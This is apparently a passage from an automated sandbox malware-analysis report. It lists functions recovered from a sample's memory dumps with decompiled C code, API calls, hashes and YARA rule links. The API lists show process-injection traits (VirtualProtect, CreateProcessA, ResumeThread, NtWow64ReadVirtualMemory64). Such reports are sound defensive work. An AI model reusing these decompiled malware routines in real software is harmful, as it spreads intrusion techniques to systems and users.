
                              Function 049D249A, Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                              Download Yara Rule
                              APIs
                              • SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 049D24C2
                                • Part of subcall function 049D5A5E: SysFreeString.OLEAUT32(?), ref: 049D5B3D
                              • SafeArrayDestroy.OLEAUT32(?), ref: 049D250F
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: ArraySafe$CreateDestroyFreeString
                              • String ID:
                              • API String ID: 3098518882-0
                              • Opcode ID: 1568369d0bf23196213fa845452e90091dd83a2cc9b84d7ce081ea70740bc4d7
                              • Instruction ID: 580f140c276b4784f294c137f65409e88b03bd6a1ffb38812bd2a900d3d1300a
                              • Opcode Fuzzy Hash: 1568369d0bf23196213fa845452e90091dd83a2cc9b84d7ce081ea70740bc4d7
                              • Instruction Fuzzy Hash: C3115B72A0050ABFDF01DFA8C844EEEBBB9EB18310F018165FA04E6160E375EA55DB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049DA415, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 42memoryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E049DA415(intOrPtr* __edi, void* _a4, void* _a8, unsigned int _a12) {
				void* _t24;
				signed short _t25;
				signed int _t27;
				intOrPtr* _t28;
				signed short _t29;

				_t28 = __edi;
				if(_a4 == 0) {
					L2:
					_t29 = E049D5607(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t29 == 0) {
						_t27 = _a12 >> 1;
						if(_t27 == 0) {
							_t29 = 2;
							HeapFree( *0x49dd270, 0, _a4);
						} else {
							_t24 = _a4;
							 *(_t24 + _t27 * 2 - 2) =  *(_t24 + _t27 * 2 - 2) & _t29;
							 *_t28 = _t24;
						}
					}
					L6:
					return _t29;
				}
				_t25 = E049D3196(_a4, _a8, _a12, __edi); // executed
				_t29 = _t25;
				if(_t29 == 0) {
					goto L6;
				}
				goto L2;
			}








                              0x049da415
                              0x049da41d
                              0x049da434
                              0x049da44f
                              0x049da453
                              0x049da458
                              0x049da45a
                              0x049da46a
                              0x049da476
                              0x049da45c
                              0x049da45c
                              0x049da45f
                              0x049da464
                              0x049da464
                              0x049da45a
                              0x049da47c
                              0x049da480
                              0x049da480
                              0x049da429
                              0x049da42e
                              0x049da432
                              0x00000000
                              0x00000000
                              0x00000000

                              APIs
                                • Part of subcall function 049D3196: SysFreeString.OLEAUT32(00000000), ref: 049D31FC
                              • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,747DF710,?,00000000,?,00000000,?,049D4C93,?,004F0053,058193B8,00000000,?), ref: 049DA476
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: Free$HeapString
                              • String ID: Uxt
                              • API String ID: 3806048269-1536154274
                              • Opcode ID: 41566d7613b2ba72e03f5b0ae0483bcb27e65fde8ae9309b36a15ac0b1555cc4
                              • Instruction ID: 7a4c075ef4d4b0c9223a66e17a68d9b25f725bbcb9ebef1478cc97fea2db9c4b
                              • Opcode Fuzzy Hash: 41566d7613b2ba72e03f5b0ae0483bcb27e65fde8ae9309b36a15ac0b1555cc4
                              • Instruction Fuzzy Hash: 33012436101259BBCF229F48CC09EEA3B6AEB08790F05C029FE045A520D731E970DBD0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D262B, Relevance: 3.0, APIs: 2, Instructions: 42memoryCOMMON
                              Download Yara Rule
                              APIs
                              • SysAllocString.OLEAUT32(049DA6E1), ref: 049D2645
                                • Part of subcall function 049D5A5E: SysFreeString.OLEAUT32(?), ref: 049D5B3D
                              • SysFreeString.OLEAUT32(00000000), ref: 049D2685
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: String$Free$Alloc
                              • String ID:
                              • API String ID: 986138563-0
                              • Opcode ID: ca0db5b7808c674a8366b07c674560b711457302fef1a7d9c8840a1d2d9899bc
                              • Instruction ID: 352b35175de9ff3f0fb137668b60570b9a0b2e4da3f3bbcf4b80856f4bf2e298
                              • Opcode Fuzzy Hash: ca0db5b7808c674a8366b07c674560b711457302fef1a7d9c8840a1d2d9899bc
                              • Instruction Fuzzy Hash: CE014F7250160ABBDF119F68D804D9BBBB9EF44314B018171EA05A6160D774ED15CBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D40AC, Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                              Download Yara Rule
                              C-Code - Quality: 37%
                              			E049D40AC(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E049D55DC(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E049D6DFA(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                              0x049d40b1
                              0x049d40bc
                              0x049d40be
                              0x049d40c4
                              0x049d40c6
                              0x049d40cb
                              0x049d40d4
                              0x049d40d8
                              0x049d40e1
                              0x049d40e5
                              0x049d40f4
                              0x049d40e7
                              0x049d40e8
                              0x049d40ed
                              0x049d40ed
                              0x049d40e5
                              0x049d40d8
                              0x049d40fd

                              APIs
                              • GetComputerNameExA.KERNEL32(00000003,00000000,049D63F4,770CC740,00000000,?,?,049D63F4), ref: 049D40C4
                                • Part of subcall function 049D55DC: RtlAllocateHeap.NTDLL(00000000,00000000,049D552C), ref: 049D55E8
                              • GetComputerNameExA.KERNEL32(00000003,00000000,049D63F4,049D63F5,?,?,049D63F4), ref: 049D40E1
                                • Part of subcall function 049D6DFA: RtlFreeHeap.NTDLL(00000000,00000000,049D55CD,00000000,?,?,00000000), ref: 049D6E06
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: ComputerHeapName$AllocateFree
                              • String ID:
                              • API String ID: 187446995-0
                              • Opcode ID: 230fb245d2eacea2b23790dcc10772d6c18f895f755f52c327bed8c95a6d100e
                              • Instruction ID: 224b858432492777e43cf96e58545879539de340310eca4d02fc4da79ffdde68
                              • Opcode Fuzzy Hash: 230fb245d2eacea2b23790dcc10772d6c18f895f755f52c327bed8c95a6d100e
                              • Instruction Fuzzy Hash: 79F0BE37600109BAEB11D6AACC00EAF3ABDDBC1650F224079A914E3141EA70EE068770
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053E3BE1, Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                              Download Yara Rule
                              APIs
                              • RtlEnterCriticalSection.NTDLL(053F0460), ref: 053E3BEB
                              • RtlLeaveCriticalSection.NTDLL(053F0460), ref: 053E3C27
                                • Part of subcall function 053D4CC6: lstrlen.KERNEL32(053EF4B4,?,00000000,?,053CB2DF,053EF4E4,?,?,00000004,00000000), ref: 053D4D13
                                • Part of subcall function 053D4CC6: VirtualProtect.KERNEL32(00000000,00000000,00000040,-00000020,?,00000000,?,053CB2DF,053EF4E4,?,?,00000004,00000000), ref: 053D4D25
                                • Part of subcall function 053D4CC6: lstrcpy.KERNEL32(00000000,053EF4B4), ref: 053D4D34
                                • Part of subcall function 053D4CC6: VirtualProtect.KERNEL32(00000000,00000000,?,-00000020,?,00000000,?,053CB2DF,053EF4E4,?,?,00000004,00000000), ref: 053D4D45
                                • Part of subcall function 053E69F0: RtlFreeHeap.NTDLL(00000000,?,053C62C2,00000000), ref: 053E69FC
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: CriticalProtectSectionVirtual$EnterFreeHeapLeavelstrcpylstrlen
                              • String ID:
                              • API String ID: 1872894792-0
                              • Opcode ID: 8ee0f7633c8f4f4352f225c1b8766a502e4180549513424193c5825c0697faf5
                              • Instruction ID: c340b798d2c3d06a854d918e9ace598aed6bd860a6ce1c0510ad0988faf67c0e
                              • Opcode Fuzzy Hash: 8ee0f7633c8f4f4352f225c1b8766a502e4180549513424193c5825c0697faf5
                              • Instruction Fuzzy Hash: BCF0EC763012189F86246F5CAD8D879FBECFB49611715015EFA0667341CE72AC109F90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053E34D9, Relevance: 2.6, APIs: 2, Instructions: 70memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 053D43EF: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 053D4428
                                • Part of subcall function 053D43EF: VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 053D445E
                                • Part of subcall function 053D43EF: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 053D446A
                                • Part of subcall function 053D43EF: lstrcmpi.KERNEL32(?,00000000), ref: 053D44A7
                                • Part of subcall function 053D43EF: StrChrA.SHLWAPI(?,0000002E), ref: 053D44B0
                                • Part of subcall function 053D43EF: lstrcmpi.KERNEL32(?,00000000), ref: 053D44C2
                                • Part of subcall function 053D43EF: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 053D4513
                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00000010,?,?,?,053EC5B8,0000002C,053D656E,064F8DBA,?,00000000,053CEAB2), ref: 053E3518
                                • Part of subcall function 053D1635: GetProcAddress.KERNEL32(?,00000000), ref: 053D165E
                                • Part of subcall function 053D1635: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,053E684F,00000000,00000000,00000028,00000100), ref: 053D1680
                              • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,053EC5B8,0000002C,053D656E,064F8DBA,?,00000000,053CEAB2,?,00000318), ref: 053E35A3
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Virtual$AllocFree$lstrcmpi$AddressMemory64ProcReadWow64
                              • String ID:
                              • API String ID: 4138075514-0
                              • Opcode ID: 56c9586a352c49e089d6bfa2a2cdb8eda355f05c4a0ce45299621207a6d9f0fc
                              • Instruction ID: 692779aa80d715cbb43f9858bc8a60d06e89806242d9fc104b99c4f51c07c2f2
                              • Opcode Fuzzy Hash: 56c9586a352c49e089d6bfa2a2cdb8eda355f05c4a0ce45299621207a6d9f0fc
                              • Instruction Fuzzy Hash: 6821F571E01228EBCF11DFA5DC88ADEBBB5BF08720F14812AF914B6290D3745A41DFA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D8F5E, Relevance: 2.6, APIs: 2, Instructions: 52COMMON
                              Download Yara Rule
                              C-Code - Quality: 32%
                              			E049D8F5E(intOrPtr _a4, signed int _a8) {
				long _v8;
				long _v12;
				char _v16;
				void* _t14;
				long _t15;
				char* _t17;
				intOrPtr* _t19;
				signed int _t22;

				_t19 = __imp__; // 0x703be700
				_t22 =  ~_a8;
				_v12 = 0;
				asm("sbb esi, esi");
				while(1) {
					_v8 = 0;
					_t14 =  *_t19(_a4, _a8, _t22, 0, 0, 0, 0); // executed
					if(_t14 != 0) {
						break;
					}
					_t15 = GetLastError();
					_v8 = _t15;
					if(_t15 != 0x2f8f) {
						if(_t15 == 0x2f00) {
							continue;
						}
					} else {
						_v16 = 0x3300;
						if(_v12 == 0) {
							_t17 =  &_v16;
							__imp__(_a4, 0x1f, _t17, 4);
							if(_t17 == 0) {
								_v8 = GetLastError();
							} else {
								_v12 = 1;
								continue;
							}
						}
					}
					L9:
					return _v8;
				}
				goto L9;
			}











                              0x049d8f65
                              0x049d8f72
                              0x049d8f74
                              0x049d8f77
                              0x049d8fbc
                              0x049d8fc4
                              0x049d8fca
                              0x049d8fce
                              0x00000000
                              0x00000000
                              0x049d8f7b
                              0x049d8f86
                              0x049d8f89
                              0x049d8fba
                              0x00000000
                              0x00000000
                              0x049d8f8b
                              0x049d8f8e
                              0x049d8f95
                              0x049d8f99
                              0x049d8fa2
                              0x049d8faa
                              0x049d8fd8
                              0x049d8fac
                              0x049d8fac
                              0x00000000
                              0x049d8fac
                              0x049d8faa
                              0x049d8f95
                              0x049d8fdb
                              0x049d8fe2
                              0x049d8fe2
                              0x00000000

                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: ErrorLast
                              • String ID:
                              • API String ID: 1452528299-0
                              • Opcode ID: c6d299c74a8fb9d4fe46abdf729c012536efcb49ba94d8e17dcb2883c222fe47
                              • Instruction ID: 2583c21f539e7df02a885171907a5caddc45c9a3052da663912d945a8ee26e1c
                              • Opcode Fuzzy Hash: c6d299c74a8fb9d4fe46abdf729c012536efcb49ba94d8e17dcb2883c222fe47
                              • Instruction Fuzzy Hash: F5012D31944108FBDF14EF99D84899FBFBEEB88750F10C076EA21E2141D774AA44DBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053CB1DA, Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                              Download Yara Rule
                              APIs
                              • GetModuleHandleA.KERNEL32(?), ref: 053CB1EF
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: HandleModule
                              • String ID:
                              • API String ID: 4139908857-0
                              • Opcode ID: baf1daf17a21de397ba0aa1d69b48f51caf23529a532cd86f51cb956704055c9
                              • Instruction ID: b09eabc20a67b882156038f941721ce4c086ab5b49e564a1fec8245aaf32b6ca
                              • Opcode Fuzzy Hash: baf1daf17a21de397ba0aa1d69b48f51caf23529a532cd86f51cb956704055c9
                              • Instruction Fuzzy Hash: 25315076A00118EFCB10DF98D896DADFBF9FB44324F9584AEE106AB251D6B0AD01CF51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D78A8, Relevance: 1.6, APIs: 1, Instructions: 75memoryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 92%
                              			E049D78A8(signed int __eax, void* __ecx, intOrPtr* _a4, void** _a8, intOrPtr* _a12) {
				signed int _v5;
				signed int _v12;
				void* _t32;
				signed int _t37;
				signed int _t39;
				signed char _t45;
				void* _t49;
				char* _t51;
				signed int _t65;
				signed int _t66;
				signed int _t69;

				_v12 = _v12 & 0x00000000;
				_t69 = __eax;
				_t32 = RtlAllocateHeap( *0x49dd270, 0, __eax << 2); // executed
				_t49 = _t32;
				if(_t49 == 0) {
					_v12 = 8;
				} else {
					 *_a8 = _t49;
					do {
						_t45 =  *_a4;
						asm("cdq");
						_t65 = 0x64;
						_t37 = (_t45 & 0x000000ff) / _t65;
						_v5 = _t37;
						if(_t37 != 0) {
							 *_t49 = _t37 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t37 * 0x9c;
						}
						asm("cdq");
						_t66 = 0xa;
						_t39 = (_t45 & 0x000000ff) / _t66;
						if(_t39 != 0 || _v5 != _t39) {
							 *_t49 = _t39 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t39 * 0xf6;
						}
						_a4 = _a4 + 1;
						 *_t49 = _t45 + 0x30;
						 *(_t49 + 1) = 0x2c;
						_t49 = _t49 + 2;
						_t69 = _t69 - 1;
					} while (_t69 != 0);
					_t51 = _t49 - 1;
					 *_a12 = _t51 -  *_a8;
					 *_t51 = 0;
				}
				return _v12;
			}














                              0x049d78ad
                              0x049d78b2
                              0x049d78c0
                              0x049d78c6
                              0x049d78ca
                              0x049d793b
                              0x049d78cc
                              0x049d78d0
                              0x049d78d3
                              0x049d78d6
                              0x049d78dd
                              0x049d78de
                              0x049d78df
                              0x049d78e3
                              0x049d78e6
                              0x049d78ed
                              0x049d78f3
                              0x049d78f4
                              0x049d78f4
                              0x049d78fb
                              0x049d78fc
                              0x049d78fd
                              0x049d7901
                              0x049d790d
                              0x049d7913
                              0x049d7914
                              0x049d7914
                              0x049d7916
                              0x049d791c
                              0x049d791e
                              0x049d7923
                              0x049d7924
                              0x049d7924
                              0x049d792a
                              0x049d7933
                              0x049d7935
                              0x049d7938
                              0x049d7947

                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 049D78C0
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: AllocateHeap
                              • String ID:
                              • API String ID: 1279760036-0
                              • Opcode ID: 6db4e84bbf5c7ff1a4823351a13d94db49323ce420724652f6191e3f94e08aa9
                              • Instruction ID: b70af1c5eddeb8ae14f2e2db393f15d0c906a88648b5229891633aa93c8b59f8
                              • Opcode Fuzzy Hash: 6db4e84bbf5c7ff1a4823351a13d94db49323ce420724652f6191e3f94e08aa9
                              • Instruction Fuzzy Hash: 31112972686344AFEB058F6DC491BE97FA9DB13358F1480EEE4808B292C277950BC760
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053E35B6, Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                              Download Yara Rule
                              APIs
                              • GetModuleHandleA.KERNEL32(?,00000003,053EF514,00000000,011075A8,?,053CB24B,00000004,00000000), ref: 053E35F1
                                • Part of subcall function 053E4582: NtQueryInformationProcess.NTDLL(00000000,053CB24B,00000018,00000000,053F0460), ref: 053E4599
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: HandleInformationModuleProcessQuery
                              • String ID:
                              • API String ID: 2776635927-0
                              • Opcode ID: 07af86b7a27ce13d461ae9e7d6dca8d5b252a6947a6fb784c6d3697f84f9ec0f
                              • Instruction ID: 8027559d7e8bde2c803f6036ae9787336a009387c07e361995721771f941dd1f
                              • Opcode Fuzzy Hash: 07af86b7a27ce13d461ae9e7d6dca8d5b252a6947a6fb784c6d3697f84f9ec0f
                              • Instruction Fuzzy Hash: 22211D75600615AFDF20CF69C5C497A77E9FF462A0B144C69E99A8B390DAB1F900CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053C13F2, Relevance: 1.6, APIs: 1, Instructions: 52processCOMMON
                              Download Yara Rule
                              APIs
                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 053C1444
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: CreateProcess
                              • String ID:
                              • API String ID: 963392458-0
                              • Opcode ID: 4461dc33ef95121a0bc6764b3b5c2b322a40ab468bc9fc5392b3916a8b31dd35
                              • Instruction ID: de59309e7cd41e748c477a41fad0c4f3e0fd53601e40b72b04c29c965751a85c
                              • Opcode Fuzzy Hash: 4461dc33ef95121a0bc6764b3b5c2b322a40ab468bc9fc5392b3916a8b31dd35
                              • Instruction Fuzzy Hash: 1B11393220020AAFCF019FA9DC409DA7FA9FF08260B058169FE19A6161C771DC31EBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D3196, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                              Download Yara Rule
                              C-Code - Quality: 34%
                              			E049D3196(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				short _v20;
				intOrPtr _t15;
				short _t17;
				intOrPtr _t19;
				short _t23;

				_t23 = 0;
				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x49dd2b8; // 0xe3a5a8
				_t4 = _t15 + 0x49de39c; // 0x5818944
				_t20 = _t4;
				_t6 = _t15 + 0x49de124; // 0x650047
				_t17 = E049D5A5E(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					if(_v20 != 8) {
						_t23 = 1;
					} else {
						_t19 = E049D6794(_t20, _v12);
						if(_t19 == 0) {
							_t23 = 8;
						} else {
							 *_a16 = _t19;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                              0x049d31a0
                              0x049d31a2
                              0x049d31a9
                              0x049d31aa
                              0x049d31ab
                              0x049d31ac
                              0x049d31b2
                              0x049d31b7
                              0x049d31b7
                              0x049d31c1
                              0x049d31d3
                              0x049d31da
                              0x049d3209
                              0x049d31dc
                              0x049d31e1
                              0x049d3206
                              0x049d31e3
                              0x049d31e6
                              0x049d31ed
                              0x049d31f8
                              0x049d31ef
                              0x049d31f2
                              0x049d31f2
                              0x049d31fc
                              0x049d31fc
                              0x049d31e1
                              0x049d3210

                              APIs
                                • Part of subcall function 049D5A5E: SysFreeString.OLEAUT32(?), ref: 049D5B3D
                                • Part of subcall function 049D6794: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,049D3D8B,004F0053,00000000,?), ref: 049D679D
                                • Part of subcall function 049D6794: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,049D3D8B,004F0053,00000000,?), ref: 049D67C7
                                • Part of subcall function 049D6794: memset.NTDLL ref: 049D67DB
                              • SysFreeString.OLEAUT32(00000000), ref: 049D31FC
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: FreeString$lstrlenmemcpymemset
                              • String ID:
                              • API String ID: 397948122-0
                              • Opcode ID: 6edcf46264b0983d34d7d84c1221717f2ff8f438093f256d01e06e8f7597a338
                              • Instruction ID: 28d97d09bc25239f5c33a6c9ecaf86a4bfb7ea5656b543acf3c8e64c3520643b
                              • Opcode Fuzzy Hash: 6edcf46264b0983d34d7d84c1221717f2ff8f438093f256d01e06e8f7597a338
                              • Instruction Fuzzy Hash: D2017532500129BFDF219F98CD05DAEBBB9FB48714F008935EE15E6060E370B955CB92
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053CB16F, Relevance: 1.5, APIs: 1, Instructions: 15threadCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 053D9288: GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,053F01F4,00000000,053CB176,?,053C145C,?), ref: 053D92A7
                                • Part of subcall function 053D9288: PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,053F01F4,00000000,053CB176,?,053C145C,?), ref: 053D92B2
                                • Part of subcall function 053D9288: _wcsupr.NTDLL ref: 053D92BF
                                • Part of subcall function 053D9288: lstrlenW.KERNEL32(00000000), ref: 053D92C7
                              • ResumeThread.KERNEL32(00000004,?,053C145C,?), ref: 053CB184
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: FileName$FindImagePathProcessResumeThread_wcsuprlstrlen
                              • String ID:
                              • API String ID: 3646851950-0
                              • Opcode ID: 6eef6018e56694d358097bdb01943b9fd2eb3421eb82574b62e2dede6fcf8565
                              • Instruction ID: eafb53cde9606c2dc82b216d4fb9dbc782788f8801bfadebe02234915d161200
                              • Opcode Fuzzy Hash: 6eef6018e56694d358097bdb01943b9fd2eb3421eb82574b62e2dede6fcf8565
                              • Instruction Fuzzy Hash: AED05E36204345A6DA225620CE0BF26FEE3AF40B88F44885DF98A44060C7B28C14A715
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053E856E, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                              Download Yara Rule
                              APIs
                              • ___delayLoadHelper2@8.DELAYIMP ref: 053E8560
                                • Part of subcall function 053E86A9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,0002C5B4,053C0000), ref: 053E8722
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: ExceptionHelper2@8LoadRaise___delay
                              • String ID:
                              • API String ID: 123106877-0
                              • Opcode ID: 2890b7da0169951c9cc0772c5e5f153a34bc1e75bcbf56cddcd055335a689f05
                              • Instruction ID: 9a3234c7ea5a29a824fd9bcb1f4b222a474182ee806e32cb68c1c7c91b3b10eb
                              • Opcode Fuzzy Hash: 2890b7da0169951c9cc0772c5e5f153a34bc1e75bcbf56cddcd055335a689f05
                              • Instruction Fuzzy Hash: ADA011E2BAA222BC3808A3023C2AC3B828CC0C0A20330880AE802A00C0ACA00C020032
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053E8553, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                              Download Yara Rule
                              APIs
                              • ___delayLoadHelper2@8.DELAYIMP ref: 053E8560
                                • Part of subcall function 053E86A9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,0002C5B4,053C0000), ref: 053E8722
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: ExceptionHelper2@8LoadRaise___delay
                              • String ID:
                              • API String ID: 123106877-0
                              • Opcode ID: 2fd38d8ec5fc73e225db0cabea626358f4d8447dd7cb9a2299a3406d604118ff
                              • Instruction ID: 2d6b0752129f1a07179683c18b69b27733531fd7cedf7a67fff3bf4abe99965d
                              • Opcode Fuzzy Hash: 2fd38d8ec5fc73e225db0cabea626358f4d8447dd7cb9a2299a3406d604118ff
                              • Instruction Fuzzy Hash: 2BA002D57E51657C750453557D2DC7B869DC4D19113305559F511A44C05D501D461135
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D55DC, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E049D55DC(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x49dd270, 0, _a4); // executed
				return _t2;
			}




                              0x049d55e8
                              0x049d55ee

                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,00000000,049D552C), ref: 049D55E8
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: AllocateHeap
                              • String ID:
                              • API String ID: 1279760036-0
                              • Opcode ID: ada8b5bf8815ddde3b37d4368863fc9366d08b6aeebb5f40083d8589b6a5d708
                              • Instruction ID: ea160051772054de164278588839c55561a9cf2e5943fff59cc027a6fc95af65
